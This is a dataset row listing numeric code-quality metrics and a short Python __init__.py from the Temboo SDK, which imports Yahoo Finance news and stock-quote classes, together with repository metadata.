| 17.333333
| 0.765957
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c44ab29ba69334b0e31a13c66d028826bea47c66
| 274
|
py
|
Python
|
temboo/core/Library/Yahoo/Finance/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Yahoo/Finance/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Yahoo/Finance/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Yahoo.Finance.GetNews import GetNews, GetNewsInputSet, GetNewsResultSet, GetNewsChoreographyExecution
from temboo.Library.Yahoo.Finance.GetStockQuote import GetStockQuote, GetStockQuoteInputSet, GetStockQuoteResultSet, GetStockQuoteChoreographyExecution
| 91.333333
| 151
| 0.89781
| 22
| 274
| 11.181818
| 0.636364
| 0.081301
| 0.138211
| 0.178862
| 0.235772
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051095
| 274
| 2
| 152
| 137
| 0.946154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.